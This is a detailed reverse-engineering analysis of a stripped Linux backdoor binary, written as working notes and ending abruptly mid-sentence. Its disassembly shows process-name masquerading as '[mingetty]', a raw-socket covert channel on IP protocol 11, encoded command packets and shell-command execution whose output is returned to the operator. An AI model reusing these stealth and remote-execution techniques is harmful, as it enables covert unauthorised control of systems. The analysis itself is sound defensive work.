Analysis This analysis was written as a work in progress. It is not written as a review, it was written line-by-line during the disassembly process, and as such, shows all ideas and methods used to draw the various conclusions about the binary. People will find this useful if they: * Have a firm grasp on x86 assembly. * Are interested in investigating Linux binary files. * Have lots of time :) It should be noted, this document was constrcuted over many nights and early mornings, as such some things may make no sense... A. Binary Analysis i) Binary type: exploit-dev:/reverse# file the-binary the-binary: ELF 32-bit LSB executable, Intel 80386, version 1, statically linked, stripped ii) Execution starting point: Since the binary could well be quite smart (and its stripped - ugh), we'll get ourselves a dump of the important parts of the elf header: exploit-dev:/reverse# hexdump the-binary | head -n 2 0000000 457f 464c 0101 0001 0000 0000 0000 0000 0000010 0002 0003 0001 0000 8090 0804 0034 0000 Important parts of this data are the bytes 0000018 to 000001B. Important because this is "e_entry" - entry point for the code (little endian byte order - also obtained from header). [see Elf32_Ehdr - elf.h] e_entry = 0x08048090 iii) The code is disassembled, starting from 0x08048090. What is seen is quite standard C setup code. After following several calls and finding nothing tricky, we reach a set of instructions that appear to correspond to further coded execution points. These are: 0x80480e1: call 0x8048080 0x80480e6: call 0x8048134 0x80480eb: pushl %eax 0x80480ec: call 0x8055fbc Analysis of the first call at 0x80480e1 shows it to resemble the initialisation section that calls any constructors and returns. dumping the .ctors (constructors) section shows: (gdb) x/12b 0x80792ac 0x80792ac: 0xff 0xff 0xff 0xff 0x00 0x00 0x00 0x00 0x80792b4: 0xff 0xff 0xff 0xff This indicates (and analysis of the call at 0x80480e1 shows) that there are no constructors! Yet again, a whole lot of code analysis, with no secret special undercover bits found. While looking at this section, it should be noted this is standard startup code, with the above three calls corresponding to init, main, and exit codes which are present in any standard elf32 gcc-compiled binary. (Running strings on the binary reveals that GNU GCC 2.7.2 appears to be the compiler used!) iv) "main" Analysis - finally something of interest... For the purposes of this code we'll term the memory reference at 0x8048134 as "main" since this is probably what it would correspond to for the blackhat. One thing can be noted straight off, this is NOT one of those short generic kiddie backdoors, it is long and complex and is a real *&^@#! because it's stripped. i.e. This is going to be an extremely long process to analyse it in any depth. Any shallow investigation work on it will only lead to the missing of the details. With that said however, the setup code here contains little new or specific to this binary. As such, the smaller details here will only be mentioned with assembly ranges rather than a full disassembly with line-by-line commentary. If one wishes to follow this section, they are advised to be running a dissassembler on the binary in another console. ;) Getting right into the code, we saw earlier the call to 0x8048134. This marks the start of the "main" code: 0x8048134 - 0x804817a: generic function/variable setup. 0x804817b: call 0x805720c Inspection: 0x805720f: movl $0x31,%eax 0x8057214: int $0x80 [Quick howto for asm int $0x80 (calls 0x31 == 49)] exploit-dev:/reverse# grep -i "49" /usr/include/asm/unistd.h #define __NR_geteuid 49 Simply looks like generic geteuid() code 0x8048180 - 0x804818a: If we do not have root privs, we call 0x8055fbc. A quick look at the code of this function makes it look like exit() code - But has not been checked in-depth!!. 0x804818c - 0x804819e: This section i have never seen any compiler generate code like this. It has the effect of determining string length (It may possibly be some form of custom inline assembly?) [Later realised the binary has been compiled with optimisations, and this is more than likely an optimised strlen().] 0x804819f - 0x80481a7: Unsure of function call. From the stack setup it looks to be function(pointer, 0, pointer). Possibly a memset() but needs to be verified with execution. 0x80481a8 - 0x80481cb: A direct memory copy of 10 bytes from 0x80675d8. (gdb) x/1s 0x80675d8 0x80675d8: "[mingetty]" It is assumed this is an argv[0] replacement to hide the binary under programs such as ps. If so, then the previous section is more than likely a memset() as assumed. 0x80481cc - 0x80481d4: Call which eventually leads to: 0x80574ef: movl $0x43,%eax 0x80574f7: int $0x80 sigaction() call. Setup seems to be for signal(). pushl's at 0x80481cc and 0x80481ce would correspond to signal(SIGCHLD, SIG_IGN). This lets a parent process to not have to wait for the child process to finish. 0x80481d5 - 0x80481d9: Call which eventually leads to: 0x80571eb: movl $0x2,%eax 0x80571f0: int $0x80 fork() call. This would explain the previous sigaction. 0x80481da - 0x80481e7: If we are the parent we call 0x8055fbc which was earlier deemed to most likely be exit() code. Since this would be a common thing to do to daemonise code, it will be accepted that 0x8055fbc is indeed exit() code for the rest of this analysis. 0x80481e8 - 0x80481ec: Call which eventually leads to: 0x805733f: movl $0x42,%eax 0x8057344: int $0x80 setsid() call. 0x80481ed - 0x8048208: Identical signal() / fork() code. This will completely dissociate this process from any other. 0x804820c - 0x8048215: Call which eventually leads to: 0x8057138: movl $0xc,%eax 0x8057140: int $0x80 chdir() call. The value pushed onto the stack just prior to the call: (gdb) x/1s 0x80675e3 0x80675e3: "/" This is an obvious attempt to change the current directory to /. 0x8048216 - 0x804822a: Call which eventually leads to: 0x8057164: movl $0x6,%eax 0x805716c: int $0x80 close() call. Three of these are called with stack setups which correspond to: close(0), close(1), and close(2). Effectively closing all 'normal' inherited file descriptors. 0x8048249 - 0x804824f: Call which eventually leads to: 0x8057448: movl $0xd,%eax 0x8057450: int $0x80 time() call. Stack shows it is a time(0) call. 0x8048253 - 0x8048258: Looks to be a function call using the return of time(0). The function seems very complex with regards to processing, but does not seem to have any significant purpose...the use of time(0) could suggest it is an srandom() call but this only a guess and it could be something written by the author themself. 0x804825c - 0x8048266: Call which eventually leads to: 0x8056d0d: movl $0x1,%edx 0x8056d15: movl $0x66,%eax 0x8056d1a: movl %edx,%ebx 0x8056d1c: int $0x80 socketcall. Checking %ebx reveals it is actually a call for socket(). A quick look at the stack setup shows pushes of 0xb, 0x3, 0x2, corresponding to a socket(2, 3, 11). A quick look in socket.h reveals it is: socket(AF_INET, SOCK_RAW, 11). My personal /etc/protocols doesn`t have a type 11, nor could i find any reference to what actually uses this protocol. [Side note: curiosityLevel++] 0x804826d - 0x8048296: Call which eventually leads to: 0x80574ef: movl $0x43,%eax 0x80574f7: int $0x80 sigaction again. More specifically, the author seems to call signal() yet again, 4 times. Each time the first value pushed (second function parameter) is a 0x1 which corresponds to a SIG_IGN. SIGHUP, SIGTERM, and SIGCHLD correspond to the other values, with SIGCHLD ignored twice for some reason... 0x80482b0 - 0x80482c9: Call which eventually leads to: 0x8056b63: movl $0xa,%edx 0x8056b6b: movl $0x66,%eax 0x8056b70: movl %edx,%ebx 0x8056b72: int $0x80 socketcall. Once again, checking %ebx shows the call to be SYS_RECV. Looking at the setup to the call: 0x80482b0: pushl $0x0 0x80482b2: pushl $0x800 0x80482b7: leal 0xfffff800(%ebp),%eax 0x80482bd: pushl %eax 0x80482be: movl 0xffffbb38(%ebp),%ecx 0x80482c4: pushl %ecx 0x80482c5: call 0x8056b44 This corresponds to: recv(X, Y, 0x800, 0). It is assumed X is the previously created socket [Assumption later verified as correct], and Y is some buffer. This call will be a blocking call. 0x80482d5: We continue down to the first of a series of checks: 0x80482cf: movl 0xffffbb30(%ebp),%edx 0x80482d5: cmpb $0xb,0x9(%edx) Checking of what 0xffffbb30(%ebp) really is (from earlier in the code): 0x804814d: leal 0xfffff800(%ebp),%edx 0x8048153: movl %edx,0xffffbb30(%ebp) We can now see that (%edx) corresponds directly to the recv() buffer. Back to the compare statement, we can see that we compare the 10th byte of the packet to the value of 0xb. We know that the socket is a raw socket so it will fill in the buffer beginning with an IP header. A check in ip.h of an ip header shows the 10th byte should correspond to none other than the protocol. We end up comparing this to none other than 11. Considering the socket() call was for protocol 11, this is probably an unnecessary check... 0x80482e5: Next check: 0x80482df: movl 0xffffbb2c(%ebp),%ecx 0x80482e5: cmpb $0x2,(%ecx) Once again, checking what 0xffffbb2c(%ebp) really is: 0x8048159: leal 0xfffff814(%ebp),%ecx 0x804815f: movl %ecx,0xffffbb2c(%ebp) So it appears (%ecx) will point to 0x14 bytes into the recv() buffer. Nice and tidy that it points to just after a normal IP header (20bytes)! We end up comparing the first byte of the after-IP-header data and checking that it is a 0x2. 0x80482ee: Next Check: 0x80482ee: cmpl $0xc8,%esi 0x80482f4: jle 0x8048eb8 We have to go back to see what %esi is: 0x80482c5: call 0x8056b44 0x80482ca: movl %eax,%esi The "call 0x8056b44" was earlier seen to be a recv(). The next line will put the return of this function(the amount of data read by recv()) into %esi. So when we do the cmpl statement, we're actually checking if the amount of data read is at least 0xc8 bytes. For sake of loose ends, if any of these checks fail, the execution jumps to 0x8048eb8 which is where we'll end up later anyway. These checks are a typical example of "if (check && check && check) { do things }". Whether or not the checks all turn out true or false, we eventually end up at 0x8048eb8 which has: 0x8048eb8: pushl $0x2710 0x8048ebd: call 0x80555b0 0x8048ec2: addl $0x4,%esp 0x8048ec5: jmp 0x80482b0 The call at 0x80555b0 contains another call which eventually leads us to: 0x80574a4: movl $0x52,%eax 0x80574ac: int $0x80 A select() call with the following parameters: 0x80555e7: pushl %eax 0x80555e8: pushl $0x0 0x80555ea: pushl $0x0 0x80555ec: pushl $0x0 0x80555ee: pushl $0x1 0x80555f0: call 0x80574a0 This seemed rather odd until google showed the way. Pulled from the "Unix Programming Frequently Asked Questions": 1.3 How can I sleep for less than a second? [...] * You can use select() or poll(), specifying no file descriptors to test; a common technique is to write a usleep() function based on either of these... Looks like this function was simply a sleep or usleep call...(ugh #3 @ wasted time) And as can be seen: 0x8048ec5: jmp 0x80482b0 upon completion of the sleep, we jump back up to the recv() call in a continuous loop. v) Core Functionality: Section iv quickly looked at the coding that had gone into the initialisation of the binary. This section will now analyse the loop which upon glance, looks to have quite a lot of functionality (hopefully containing something to make drudging through everything else worthwhile!). This section will be looked at in a LOT more detail, with a line-by-line commentary where needed if particular areas are complex. 0x80482fa: We return back to 0x80482fa. This point should only be reached when the following conditions are met on a received packet: * IP Protocol is 11 * 1st byte (assuming 20 byte IP header) of IP packet data must be a binary 0x2. * Packet length (including IP header) must be greater than 0xc8 bytes (200 bytes). Continuing analysis: 0x80482fa: movl 0xffffbb20(%ebp),%edx 0x8048300: pushl %edx 0x8048301: movl 0xffffbb28(%ebp),%ecx 0x8048307: pushl %ecx 0x8048308: leal 0xffffffea(%esi),%eax 0x804830b: pushl %eax 0x804830c: call 0x804a1e8 The code at 0x804a1e8 does not appear to do anything of functionality. Instead, it looks to do a form of memory manipulation. The following is a quick analysis of this function and how one can draw an educated guess as to its memory manipulation purpose: It contains a single call to 0x804f808 which itself calls 0x804f820. Still nothing system-ish called even from this function directly, however it sparks up a whole tree of calls: 0x8061f34 - does memory manipulations 0x8052e80 - seems to also do memory manipulations - I recognise some string-based optimised code such as strlen(). Can't be sure that's what it is, but it is identical to the code earlier that i believe is a compiler optimised strlen(). - calls 0x8061b6c - calls 0x8066154 - contains function calls to munmap() 0x804f888 - calls 0x8052de8 - calls 0x805602c - follows some execution path i cannot follow... 0x8061910 - unsure This one call at 0x804a1e8 seems to be more about memory manipulation, possibly string-based than anything else. It is probably not worth sifting through - at least for the moment. It would probably be better left for run-time debugging. A quick look at the parameters passed to this function reveal the passing of 0xffffbb20(%ebp), 0xffffbb28(%ebp), and 0xffffffea(%esi). Matching these up with appropriate data: 0xffffbb20(%ebp): The last time 0xffffbb20(%ebp) was modified: 0x8048297: leal 0xfffff000(%ebp),%ecx 0x804829d: movl %ecx,0xffffbb20(%ebp) There are no other references earlier in the code to 0xfffff000(%ebp). This address does however fall within the initial stack allocation at the very beginning of the program: 0x8048137: subl $0x44f0,%esp There seems to be at most 0x800 bytes until the next piece of data which is referenced at 0x804814d. The next piece of data was a block of memory passed to recv() as the buffer, also with a size of 0x800. It is doubtful that this is a coincidence, and as such, 0xffffbb20(%ebp) is believed to be a buffer of 0x800 bytes [Upon completion of analysis, no other data appears to be in this range, and the assumption of a size of 0x800 bytes is believed correct]. 0xffffbb28(%ebp): The last time 0xffffbb28(%ebp) was modified occurred at startup: 0x8048165: leal 0xfffff816(%ebp),%edx 0x804816b: movl %edx,0xffffbb28(%ebp) As we saw earlier in the analysis of the packet checks, we saw that 0xfffff814(%ebp) pointed to directly after the IP header. 0xffffbb28(%ebp) obviously points to 0xfffff816(%ebp) which, as can be seen, this would point to the 3rd byte of the IP packet data. 0xffffffea(%esi): Remember that we are dealing with a leal statement this time, %esi at this point in time will still be equal to the amount of data returned by recv. 0xffffffea(%esi) will be a direct value of the amount of data received minus 0x16. So the function call looks like this: function(AmountOfDataReceived-22, IP_Packet_Data, SomeBuffer) NOTE: 0x804a1e8 will be analysed further in the function analysis section under the tile of "Data_Manipulation_Function_A". 0x8048314: At this stage, it is assumed that the previous function named "Data_Manipulation_Function_A" has quite possibly processed the IP packet data contents and since it does not appear to do anything system-wise, it is assumed its purpose is some form of encryption processing on the packet [Later verified to be true - see Function Analysis section]. The first statement of this block is: movzbl 0xfffff001(%ebp),%eax A look back at Data_Manipulation_Function_A shows the passing of 0xfffff000(%ebp) as the "SomeBuffer" (see function call appearance in previous section). %eax is loaded with the 2nd byte from this buffer. 0x804831b - 0x804832b: At first glance, this section looks complex: 0x804831b: decl %eax 0x804831c: cmpl $0xb,%eax 0x804831f: ja 0x8048eb8 0x8048325: jmp *0x804832c(,%eax,4) Experience allows this section to easily be identified as a typical implementation of a C switch() statement. This switch will be based upon the previously discussed 2nd byte from "SomeBuffer". The cmpl and ja statements are typical of a limited switch statement where no case options are met. If this selected byte is greater than 12, execution will be directed to the familiar code of 0x8048eb8. As seen earlier, this jump simply results in a brief sleeping state, followed by a jump back to the recv() function. The jmp table would have to consist of 0xc entries (each of 4 bytes), and is located at 0x804832c: (gdb) x/48b 0x804832c 0x804832c: 0x5c 0x83 0x04 0x08 0xf0 0x83 0x04 0x08 0x8048334: 0x90 0x85 0x04 0x08 0x1c 0x87 0x04 0x08 0x804833c: 0xc8 0x87 0x04 0x08 0x94 0x88 0x04 0x08 0x8048344: 0xcc 0x8a 0x04 0x08 0x58 0x8b 0x04 0x08 0x804834c: 0x80 0x8b 0x04 0x08 0x34 0x8c 0x04 0x08 0x8048354: 0x08 0x8d 0x04 0x08 0xe4 0x8d 0x04 0x08 So in a more readable format: SomeBuffer[1] jump address 1 0x0804835c 2 0x080483f0 3 0x08048590 4 0x0804871c 5 0x080487c8 6 0x08048894 7 0x08048acc 8 0x08048b58 9 0x08048b80 A 0x08048c34 B 0x08048d08 C 0x08048de4 * NOTE the decl %eax was taken into consideration hence why our list starts at 1 instead of 0. Case code (believe it or not, this is where things get complex!): 0x0804835c: This section appears to have three parts. * Setup a buffer at 0xfffff800(%ebp) * Do memory manipulation on this buffer * Send special packets containing this manipulated data The buffer setup starts off rather peculiar. It uses a memory 0 to set 0xfffff800(%ebp) to 0. Probably generated from a strcpy(Buffer, "") call that has been optimised by the compiler. It should be noted that 0xfffff800(%ebp) is the same buffer we used for recv(). It actually contains our original packet so in effect we are making modifications to the original packet. Another 3 modifications are made (First of which overwrites the 'strange' modification - adds extra strangeness to it although it could simply be a bug...). buffer at 0xfffff800(%ebp) has the following modifications: 0xfffff800(%ebp) = 1 byte value from heap at 0x807e77c. This heap position has not been modified in any way at program startup. It is probably a global variable that we will name "Global_A". 0xfffff801(%ebp) = 1 0xfffff802(%ebp) = 7 Another byte in the heap at 0x807e774 is now checked. If it is non-zero, the following is done: 0xfffff803(%ebp) = 1 0xfffff804(%ebp) = byte value at 0x807e778 If it is zero: 0xfffff803(%ebp) = 0 The following code is then followed under all conditions: 0x80483a7: movl 0xffffbb20(%ebp),%edx 0x80483ad: pushl %edx 0x80483ae: leal 0xfffff800(%ebp),%eax 0x80483b4: pushl %eax 0x80483b5: pushl $0x190 0x80483ba: call 0x804a194 The call when analysed exhibits very similar functionality as Data_Manipulation_Function_A, however it is not identical. This function at 0x804a194 will be termed Data_Manipulation_Function_B and looked at in detail in the Function Analysis section. 0xffffbb20(%ebp) seems familiar, and when looking over the previous code, it is seen to still be 0xfffff000(%ebp). This is the 'buffer' that was earlier passed to Data_Manipulation_Function_A. 0xfffff800(%ebp) is also familiar, being the buffer that contains our original packet as recived by recv(), with the modifications made earlier in this case section. Finally, the value 0x190 is hardcoded and is passed to Data_Manipulation_Function_B, prompting reasoning that this function is multi-purpose and not unique to this case section. Next part of this section: 0x80483bf: call 0x8056058 0x80483c4: movl $0xc9,%ecx 0x80483c9: cltd 0x80483ca: idivl %ecx,%eax Unknown what purpose this serves, possibly key generation of some description, but this would be a wild guess. The call does not appear to do anything system-wise. Whatever the result, %eax appears to be the reason for these instructions since: 0x80483ce: leal 0x190(%ebx),%eax 0x80483d4: pushl %eax This is the first parameter put on the stack for a new function we will look at shortly. This parameter is effectively 0x190 + the value in %ebx which was processed as part of the previous code. [Note, this call at 0x8056058 has since been thought to be a random number generator, the code just after this call would indicate it would then be MOD 0xc9] The next parameter is already becoming quite familiar: 0x80483d5: movl 0xffffbb20(%ebp),%edx 0x80483db: pushl %edx 0xffffbb20(%ebp) is already familiar, as the 'buffer' that was passed to Data_Manipulation_Function_B. The next parameter is new and has not yet been looked at: 0x80483dc: movl 0xffffbb1c(%ebp),%ecx 0x80483e2: pushl %ecx 0xffffbb1c(%ebp) falls directly before 0xffffbb20(%ebp), so it can be assumed that 0xffffbb1c(%ebp) is some form of 4 byte variable. This variable was set much earlier just prior to the recv() call: 0x80482a3: leal 0xffffee48(%ebp),%edx 0x80482a9: movl %edx,0xffffbb1c(%ebp) Looking at the contents of the stack at 0xffffee48(%ebp), the closest variable reference that can be found anywhere in the code appears to be: 0x8048638: leal 0xffffee70(%ebp),%edx This portion of code does appear to be a legitimate part of the program and will be analysed later. During this stage of analysis, the memory starting at 0xffffee48(%ebp) is suspected of being a buffer of at least 40 bytes. This portion of memory will be termed Buffer_A for the rest of this analysis. With these variables on the stack: 0x80483e3: call 0x8048ecc Attempting to piece the function into a C format: function(Buffer_A, manipulated_buffer, 0x190 + X) The function is normally reviewed prior to the parameters just to ensure it is a vital part of the code. This function was indeed quickly checked and has been determined to contain references to: 0x8056d0d: movl $0x1,%edx 0x8056d15: movl $0x66,%eax 0x8056d1a: movl %edx,%ebx 0x8056d1c: int $0x80 This corresponds to a socket() call and as such the function will be reviewed later in the function analysis section. It has been termed Network_Function_A. Upon completion of this code, a jump is followed back to 0x8048eb8. As you may recognise, this is just before the sleeping state which is followed by the jump back to recv(). [This section is re-examined later when more information is known about the various buffers and especially Network_Function_A. The re-analysis is named Re-Examination_A.] 0x080483f0: A lot of variable setup seems to occur in this section. Of note is the setting of the 0x807e780-0x807e783 range from the 17th to 20th bytes of the packet data from the recv() function. Of note, is that this is the destination IP for the packet (normally the IP of the machine running the binary). One of the first few calls executed looks like this: 0x804842d: pushl $0x0 0x804842f: call 0x8057444 0x8048434: addl $0x4,%esp 0x8048437: pushl %eax 0x8048438: call 0x80559a0 These two calls were analysed earlier when they were called from 0x8048249. At that point in time, the first call was deemed to be a time(0), and the second was suspected (but by no means confirmed) to be an srandom() call using the time(0) return as a parameter. A new function call then appears: 0x8048440: call 0x8056058 This function seems to only have one purpose, that is to call another: 0x805605b: call 0x8055e38 This one is not recognised either, and following it does not unleash its secrets. It seems to read from 0x8078958, but it is unknown just what is at this location at this time. Given the suspected srandom(), it is quite possible this is some kind of random number function! This makes a lot of sense given the next piece of code: 0x8048445: movl $0xa,%ecx 0x804844a: cltd 0x804844b: idivl %ecx,%eax This looks simply like MOD code that will ensure %eax is always a value from 0 to 9. The next section is quite complex. A full analysis will be needed. We enter the section with our 'probable' random value from 0 to 9 in %eax. A long look at the code flow of the following shows it to be a loop. It looks like %ebx takes a counter and pointer role, seeing the loop through the values 0 through to 9 (would make sense considering the value in %eax): 0x804844d: movl %edx,%edi 0x804844f: xorl %ebx,%ebx 0x8048451: xorl %esi,%esi 0x8048453: nop 0x8048454: cmpl %edi,%ebx 0x8048456: je 0x804852b 0x804845c: cmpl $0x2,0x807e784 0x8048463: jne 0x8048498 [...] 0x804852e: incl %ebx 0x804852f: cmpl $0x9,%ebx 0x8048532: jle 0x8048454 The core of the code (inside the loop) consists of conditional sections with it all being encapsulated from the conditional at 0x8048454. A further conditional (and much more important) is located at 0x804845c. It splits the rest of the loop contents into two parts, and seems to be conditional on a value stored at 0x807e784. This value was set earlier in this very same case section: 0x80483f0: movzbl 0xfffff002(%ebp),%edx 0x80483f7: movl %edx,0x807e784 And once again we see the familiar 0xfffff000(%ebp) range. For a reminder, this is the data buffer passed to Data_Manipulation_Function_A earlier. As we can see, the 3rd byte is used for setting the contents of 0x807e784, which due to its location can be assumed to be a global variable. Since it seems it could be of importance, we'll name it "Global_B". With the flow sorted out, lets now look at what purpose this section could possibly play. Firstly, we have a loop that relies on a variable that is never modified within the loop. This ensures it will repeat 10 times. To simplify what is going on, the first conditional will play a role. It will trigger on all values 0 to 9 except the one that is equal to our 'random 0 to 9' number. The reason behind leaving this one out will be seen later. As for what all this code does, it seems to want to set values in the memory pointed to by 0xffffbb1c(%ebp). This just happens to be a buffer we've already identified as Buffer_A. It works like this: If Global_B (set by third byte in the manipulated buffer) = 2 Buffer_A will be set directly to contents of the manipulated buffer. Else Buffer_A's contents will be set using random numbers. It's not quite as simple as a direct memory fill. Buffer_A seems to be structured in 4 byte increments, and the buffer is either copied, or filled with random numbers accordingly. We had an earlier assumption that Buffer_A is 40 bytes long. Given this loop iterates 10 times and fills 4 bytes at a time, i think this assumption can now be accepted as true. After this loop completes: 0x8048538: movl 0x807e784,%eax 0x804853d: testl %eax,%eax 0x804853f: jne 0x8048543 0x8048541: xorl %edi,%edi 0x807e784 is Global_B. In effect, if Global_B = 0 then we'll xor out %edi to 0. %edi doesn't seem to be a permanent variable of any kind, and is used in a short time just after this check: 0x8048543: cmpl $0x2,%eax 0x8048546: je 0x8048eb8 In effect, this will compare Global_B to 0x2. If it is equal, it will jmp off to 0x8048eb8 which should now be familiar as a break from the switch(). At this point in time, we engage in a 4 byte copy from the manipulated buffer: 0x8048555: movb 0xfffff003(%ebp),%al 0x804855b: movl 0xffffbb1c(%ebp),%ecx 0x8048561: movb %al,(%edi,%ecx,1) [....] After this we break from the switch and jmp off to 0x8048eb8 ready to sleep and recv() all over again. This section's purpose is still in the dark, however i am sure all will be revealed as soon as Buffer_A's purpose can be identified. [This section is re-examined later when more information is known about the various buffers. The re-analysis is named Re-Examination_A.] 0x08048590: The very first thing we do here is call 0x80571e8 which is our fork code. Very interesting. Just as interesting is this: 0x8048595: movl %eax,0x807e770 0x804859a: testl %eax,%eax 0x804859c: jne 0x8048eb8 Effectively, if the parent processes this code, the PID of the child will be stored at 0x807e770. We'll name this heap variable as PID_Var_A. Continuing if we are the parent, we will simply end this case code and return back to the main recv() loop. If we are the child, there is a lot more interesting stuff to be done. Very first is a call to 0x805733c which corresponds to a setsid() (not confirmed at this point in time). Following this: 0x80485a7: pushl $0x1 0x80485a9: pushl $0x11 0x80485ab: call 0x80569bc 0x80485b0: call 0x80571e8 The 0x80569bc call with stack setup would correspond to: signal((SIGCHLD, SIG_IGN) This is immediately followed by another fork() call which does something interesting. If %eax is >0 (if we are the parent process) Execute the following: 0x80485bc: pushl $0xa 0x80485be: call 0x80556cc 0x80485c3: pushl $0x9 0x80485c5: movl 0x807e770,%eax 0x80485ca: pushl %eax 0x80485cb: call 0x80572b0 0x80485d0: pushl $0x0 0x80485d2: call 0x8055fbc 0x80556cc has not yet been identified. So we go look.. This function calls: 0x8057360: 0x8057364: movl $0x7e,%eax 0x8057372: int $0x80 This corresponds to sigprocmask() 0x80574c8: 0x80574ef: movl $0x43,%eax 0x80574f7: int $0x80 This corresponds to sigaction() 0x8057444 = time() (already identified) 0x8057418: 0x805741c: movl $0x1b,%eax 0x8057421: movl 0x8(%ebp),%ebx 0x8057424: int $0x80 This corresponds to alarm() 0x805751c: 0x8057522: movl $0x48,%eax 0x8057530: int $0x80 This corresponds to sigsuspend() The function can still not be staisfactorily identified, however it is possibly a sleep() which would indicate the function at 0x80555b0 is not sleep() (it might be a usleep()). If indeed this function IS a sleep(), then it should be easily verifiable during runtime analysis. In assuming this function was a sleep, this would indicate a 10 second sleep occurs. Returning back to 0x80485cb, a call of 0x80572b0 is executed. This function is also not known, so.... 0x80572b4: movl $0x25,%eax 0x80572bf: int $0x80 This corresponds to a kill() Just for ease, we'll reshow the code from above: 0x80485c3: pushl $0x9 0x80485c5: movl 0x807e770,%eax 0x80485ca: pushl %eax 0x80485cb: call 0x80572b0 Since we also know what 0x807e770 is, this all looks like: kill(PID_Var_A, 9) The next call is to 0x8055fbc, and has already been identified as an exit() (still only assumed but still seems logical). This ends the parent process from the last fork. I am unsure if this is a bug on behalf of the author. Since PID_Var_A would be 0 since we would be the child process from the first fork, this may not actually work as intended. Perhaps this does kill the child process too, but first thoughts make me believe this is a bug. One way or another, the parent process from the most recent fork is no more. [Turns out this kill DOES work.] Else (if we were the child process) We pick up again at 0x80485d8. One of the first things we do is this loop: 0x80485dc: movb 0xfffff002(%ebx,%ebp,1),%al 0x80485e3: movb %al,0xfffff000(%ebx,%ebp,1) 0x80485ea: incl %ebx 0x80485eb: cmpl $0x18d,%ebx 0x80485f1: jle 0x80485dc This may be as simple as an optimised memcpy(). All it does is copy 0x18d bytes from 0xfffff002(%ebp) to 0xfffff000(%ebp). This effectively shifts the data across by 2 bytes in the buffer that was earlier passed to Data_Manipulation_Function_A. This would make sense considering we earlier used the 2nd byte of the data to determine the switch() outcome. Following on: 0x80485f3: pushl $0x80675e6 0x80485f8: movl 0xffffbb20(%ebp),%ecx 0x80485fe: pushl %ecx 0x80485ff: pushl $0x80675f5 0x8048604: leal 0xfffff800(%ebp),%ebx 0x804860a: pushl %ebx 0x804860b: call 0x804f808 0x804f808 is an unidentified function. In earlier trying to follow it, I found it too complex and long to follow, so instead we'll look at some of its parameters: (gdb) x/1s 0x80675e6 0x80675e6: "/tmp/.hj237349" (gdb) x/1s 0x80675f5 0x80675f5: "/bin/csh -f -c \"%s\" 1> %s 2>&1" 0xffffbb20(%ebp) is a pointer to 0xfffff000(%ebp) which is the buffer that was earlier passed to Data_Manipulation_Function_A. 0xfffff800(%ebp) is the buffer that was earlier passed to the recv() function. The string contents at 0x80675f5 stand out to give us a fairly reasonable guess as to what the function is (i.e. *printf/*scanf) As a guess, one would expect 0xfffff000, now that is has been shifted two bytes to the left is a string command sent by the blackhat. Still cannot assume an sprintf() until: 0x8048610: pushl %ebx 0x8048611: call 0x80557e8 This call is yet unidentified, so in following it, we see it does interrupt executions of: sigaction, sigprocmask, fork, execve. Since its not a direct execve call (and given the redirection string that was passed to it) it is assumed the function at 0x80557e8 is system(). This is not verified, but given the amount of code involved with this function, im more tempted to assume than have to verify it... Also, the earlier function at 0x804f808 is now also assumed to be a sprintf() given all the work done to the buffer in %ebx (shifting it), and the string parameters being located on the heap, i cannot see a reason for an sscanf. to be true in order for system() to function correctly. So assuming all the above, our execution looks like: /bin/csh -f -c "somecommand" 1> /tmp/.hj237349 2>&1 This is a simple cshell command redirection into /tmp/.hj237349 which at first glance might seem kind of pointless, however: 0x8048616: pushl $0x8067614 0x804861b: pushl $0x80675e6 0x8048620: call 0x804f620 The call is fairly long, so to cut a long story short: 0x80572e0: movl $0x5,%eax 0x80572ee: int $0x80 We end up with an open() call. The parameters to this call look like this: (gdb) x/1s 0x8067614 0x8067614: "rb" (gdb) x/1s 0x80675e6 0x80675e6: "/tmp/.hj237349" Its fairly clear this is a fopen() call, however it was only quickly skimmed through and could be something else. After checking that the fopen() call succeeds and do some parameter setup, we end up calling 0x804f6d4. This function is an unknown, and unfortunately the call at 0x8061d42 makes life a little more difficult. Instead of trying to work out what the internals of this function do, we'll look at its parameters that have been pushed onto the stack before it is called: 0x8048644: movl 0xffffbb24(%ebp),%ecx 0x804864a: pushl %ecx 0x804864b: pushl $0x18e 0x8048650: pushl $0x1 0x8048652: leal 0xfffff800(%ebp),%eax 0x8048658: pushl %eax 0x8048659: call 0x804f6d4 This looks like: function(Buffer, 1, 0x18e, 0xffffbb24(%ebp)) This still doesn't help much until we realise what 0xffffbb24(%ebp) actually is. Just after the fopen(): 0x8048625: movl %eax,0xffffbb24(%ebp) So, it looks like 0xffffbb24(%ebp) is our file descriptor. Now an immediate assumption would be an fread or fwrite. Considering our permissions on the file, we'll assume 0x804f6d4 is an fread(). We then engage in a memcpy-type arrangement: 0x8048670: movb 0xfffff800(%ebx,%ebp,1),%al 0x8048677: movb %al,0xfffff002(%ebx,%ebp,1) 0x804867e: incl %ebx 0x804867f: cmpl $0x18d,%ebx 0x8048685: jle 0x8048670 This copies the read data from the file into 0xfffff002(%ebx)+. We then run a pointer to this buffer starting at 0xfffff000(%ebp) to the function at 0x804a194 (Data_Manipulation_Function_B), followed by a call of Network_Function_A. It is at this point i am almost certain that Data_Manipulation_Function_A is some kind of decoder, and Data_Manipulation_Function_B is some kind of encoder. The encoded data would be being passed to Network_Function_A which would then pass the encoded packets on to the blackhat. We cant assume this to be an exact conclusion as yet until those three functions have been analysed in depth, however it's looking like a pretty solid guess. Jumping back just before we encode the data however, something interesting happens. The code seems to keep tabs on %edi: 0x8048687: testl %edi,%edi 0x8048689: jne 0x804869c It seems to act as a toggle. At first i didn't catch the second loop and thus couldn’t understand this, but when one realises that there is a loop that continuously reads 0x18e bytes from the file and sends the number of bytes read, then reads another 0x18e bytes (if it is available) then sends that..etc..etc.., then the purpose of %edi is realised. As the first packet is created, the 2nd byte is set to a 3, and %edi is set to 1. Changing %edi like this enables the trojan to know to send the next section of up to 0x18e with the 2nd byte set to a 4. This is undoubtedly for the benefit of any client listening to the response. We can immediately assume something about the client from this, but we'll look at client conclusions later. A call to what we currently believe to be a usleep() implementation is then done with a 0x61a80 sleep time. If we finally finish reading all the data from the redirection file, we end up falling out of the loop at and end up at 0x80486f9. From here: 0x80486f9: movl 0xffffbb24(%ebp),%edx 0x80486ff: pushl %edx 0x8048700: call 0x804f540 The function call is unknown at this time, but 0xffffbb24(%ebp) looks familiar, and looking back to the fopen() and fread(), this would have to be the file descriptor. One could immediately assume this function call is an fclose(), but even i'm not into those sort of jumpy assumptions. Following the long call chain associated with this function reveals nothing! It is an extremely long fuction, with the only system call found being munmap(). A lot of variable calls are made which make tracking this function extremely difficult. One would have been hoping for a %eax of 6 with an int $0x80 to show 